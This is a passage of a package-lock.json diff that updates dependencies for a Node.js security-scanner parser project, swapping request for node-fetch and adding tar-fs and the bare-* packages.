"@types/ws": "^8.5.3", - "byline": "^5.0.0", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "optionalDependencies": { - "openid-client": "^5.3.0" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, "node_modules/@securecodebox/parser-sdk-nodejs": { @@ -831,12 +916,14 @@ "node_modules/@sinclair/typebox": { "version": "0.27.8", "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==" + "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", + "dev": true }, "node_modules/@sinonjs/commons": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", + "dev": true, "dependencies": { "type-detect": "4.0.8" } @@ -845,6 +932,7 @@ "version": "10.3.0", "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", + "dev": true, "dependencies": { "@sinonjs/commons": "^3.0.0" } @@ -853,6 +941,7 @@ "version": "7.20.5", "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", + "dev": true, "dependencies": { "@babel/parser": "^7.20.7", "@babel/types": "^7.20.7", @@ -865,6 +954,7 @@ "version": "7.6.8", "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", + "dev": true, "dependencies": { "@babel/types": "^7.0.0" } @@ -873,6 +963,7 @@ "version": "7.4.4", "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", + "dev": true, "dependencies": { "@babel/parser": "^7.1.0", "@babel/types": "^7.0.0" @@ -882,20 +973,16 @@ "version": "7.20.6", "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", + "dev": true, "dependencies": { "@babel/types": "^7.20.7" } }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, "node_modules/@types/graceful-fs": { "version": "4.1.9", "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", + "dev": true, "dependencies": { "@types/node": "*" } @@ -903,12 +990,14 @@ "node_modules/@types/istanbul-lib-coverage": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==" + "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", + "dev": true }, "node_modules/@types/istanbul-lib-report": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", + "dev": true, "dependencies": { "@types/istanbul-lib-coverage": "*" } @@ -917,6 +1006,7 @@ "version": "3.0.1", "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", + "dev": true, "dependencies": { "@types/istanbul-lib-report": "*" } @@ -925,6 +1015,7 @@ "version": "29.5.14", "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", + "dev": true, "dependencies": { "expect": "^29.0.0", "pretty-format": "^29.0.0" @@ -937,41 +1028,38 @@ "dev": true }, "node_modules/@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", + "version": "22.15.32", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.15.32.tgz", + "integrity": "sha512-3jigKqgSjsH6gYZv2nEsqdXfZqIFGAV36XYYjf9KGZ3PSG+IhLecqPnI310RvjutyMwifE2hhhNEklOUrvx/wA==", + "dev": true, + "license": "MIT", "dependencies": { - "undici-types": "~6.19.2" + "undici-types": "~6.21.0" } }, - "node_modules/@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "dev": true, + "license": "MIT", "dependencies": { - "@types/caseless": "*", "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" + "form-data": "^4.0.0" } }, "node_modules/@types/stack-utils": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==" - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==", + "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", "dev": true }, - "node_modules/@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", "dev": true, + "license": "MIT", "dependencies": { "@types/node": "*" } @@ -980,6 +1068,7 @@ "version": "17.0.24", "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", + "dev": true, "dependencies": { "@types/yargs-parser": "*" } @@ -987,28 +1076,24 @@ "node_modules/@types/yargs-parser": { "version": "21.0.0", "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==" + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", "dev": true, - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "license": "MIT", + "engines": { + "node": ">= 14" } }, "node_modules/ansi-escapes": { "version": "4.3.2", "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dev": true, "dependencies": { "type-fest": "^0.21.3" }, @@ -1023,6 +1108,7 @@ "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "dev": true, "engines": { "node": ">=8" } @@ -1031,6 +1117,7 @@ "version": "4.3.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, "dependencies": { "color-convert": "^2.0.1" }, @@ -1045,6 +1132,7 @@ "version": "3.1.3", "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, "dependencies": { "normalize-path": "^3.0.0", "picomatch": "^2.0.4" @@ -1059,54 +1147,31 @@ "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", "dev": true }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "dev": true, - "engines": { - "node": ">=0.8" - } - }, "node_modules/async": { "version": "3.2.6", "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==" + "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", + "dev": true }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", - "dev": true - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "dev": true, - "engines": { - "node": "*" - } + "license": "MIT" }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==", - "dev": true + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "dev": true, + "license": "Apache-2.0" }, "node_modules/babel-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", + "dev": true, "dependencies": { "@jest/transform": "^29.7.0", "@types/babel__core": "^7.1.14", @@ -1127,6 +1192,7 @@ "version": "6.1.1", "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", + "dev": true, "dependencies": { "@babel/helper-plugin-utils": "^7.0.0", "@istanbuljs/load-nyc-config": "^1.0.0", @@ -1142,6 +1208,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", + "dev": true, "dependencies": { "@babel/template": "^7.3.3", "@babel/types": "^7.3.3", @@ -1156,6 +1223,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", + "dev": true, "dependencies": { "@babel/plugin-syntax-async-generators": "^7.8.4", "@babel/plugin-syntax-bigint": "^7.8.3", @@ -1178,6 +1246,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", + "dev": true, "dependencies": { "babel-plugin-jest-hoist": "^29.6.3", "babel-preset-current-node-syntax": "^1.0.0" @@ -1192,21 +1261,92 @@ "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dev": true }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "dev": true, + "license": "Apache-2.0", + "optional": true + }, + "node_modules/bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "dev": true, + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" + }, + "engines": { + "bare": ">=1.16.0" + }, + "peerDependencies": { + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } + } + }, + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "dev": true, + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" + } + }, + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "dev": true, + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-os": "^3.0.1" + } + }, + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "tweetnacl": "^0.14.3" + "streamx": "^2.21.0" + }, + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "version": "1.1.12", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", + "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", + "dev": true, + "license": "MIT", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" @@ -1216,6 +1356,7 @@ "version": "3.0.3", "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dev": true, "dependencies": { "fill-range": "^7.1.1" }, @@ -1227,6 +1368,7 @@ "version": "4.24.2", "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", + "dev": true, "funding": [ { "type": "opencollective", @@ -1258,6 +1400,7 @@ "version": "0.2.6", "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", + "dev": true, "dependencies": { "fast-json-stable-stringify": "2.x" }, @@ -1269,6 +1412,7 @@ "version": "2.1.1", "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", + "dev": true, "dependencies": { "node-int64": "^0.4.0" } @@ -1276,21 +1420,28 @@ "node_modules/buffer-from": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==" + "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", + "dev": true }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + }, "engines": { - "node": ">=0.10.0" + "node": ">= 0.4" } }, "node_modules/callsites": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "dev": true, "engines": { "node": ">=6" } @@ -1299,6 +1450,7 @@ "version": "5.3.1", "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "dev": true, "engines": { "node": ">=6" } @@ -1307,6 +1459,7 @@ "version": "1.0.30001680", "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", + "dev": true, "funding": [ { "type": "opencollective", @@ -1322,16 +1475,11 @@ } ] }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==", - "dev": true - }, "node_modules/chalk": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, "dependencies": { "ansi-styles": "^4.1.0", "supports-color": "^7.1.0" @@ -1347,14 +1495,6 @@ "version": "1.0.2", "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", "dev": true, "engines": { "node": ">=10" @@ -1364,6 +1504,7 @@ "version": "3.8.0", "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", + "dev": true, "funding": [ { "type": "github", @@ -1377,12 +1518,14 @@ "node_modules/cjs-module-lexer": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==" + "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", + "dev": true }, "node_modules/cliui": { "version": "8.0.1", "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "dev": true, "dependencies": { "string-width": "^4.2.0", "strip-ansi": "^6.0.1", @@ -1396,6 +1539,7 @@ "version": "4.6.0", "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", + "dev": true, "engines": { "iojs": ">= 1.0.0", "node": ">= 0.12.0" @@ -1404,12 +1548,14 @@ "node_modules/collect-v8-coverage": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": 